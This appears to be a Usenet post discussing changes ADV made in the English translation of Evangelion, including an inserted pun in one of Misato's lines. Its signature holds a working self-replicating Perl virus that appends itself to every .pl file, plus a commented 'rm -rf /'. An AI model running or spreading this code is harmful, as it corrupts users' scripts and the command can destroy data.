Scripsit illa aut ille DBM <>:
> What did the 'preparation' of Clones in Terminal Dogma really entail?
> And is what we've read in the English Translations of EVA a true &
> literal
> translation?
> Or is it just 'close enough'?  Could it be that translation has
> 'dulled' the truth of the story, like what happened with so many other
> Anime, like 'Card Captors'?
> How would we know if errors/mistranslations/'story fade' has occured?

There was already a thread about it - and no real consent.

Get the scripts from the "literal translation project" and compare on
your own. I'd say there were changes, but they were not really relevant.
The story itself has not changed in any way, but there are some things
that look like being stuff for overanalyzing until you know they were
created by ADV in the translations. Examples are some references to God
that aren't there in the Japanese dub and this - my favorite example:

| Misato: Well, since from now on this is your house, you can really feel
|         at home here.

| Misato: This is your home now, so make yourself comfortable, and take
|         advantage of everything here, except me.

You see the English pun ADV have inserted [1]?

BTW: the lines prefixed with '#' in the literal translations are in no
way as unimportant as comments in programming languages introduced with
#. They are good to read.

[1]: Think about the meanings of "to take advantage of something" and "to
     take advantage of someone", then about how the words "everything"
     and "me" are used here.
[2]: The second footnote is incorrect in this posting.

#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
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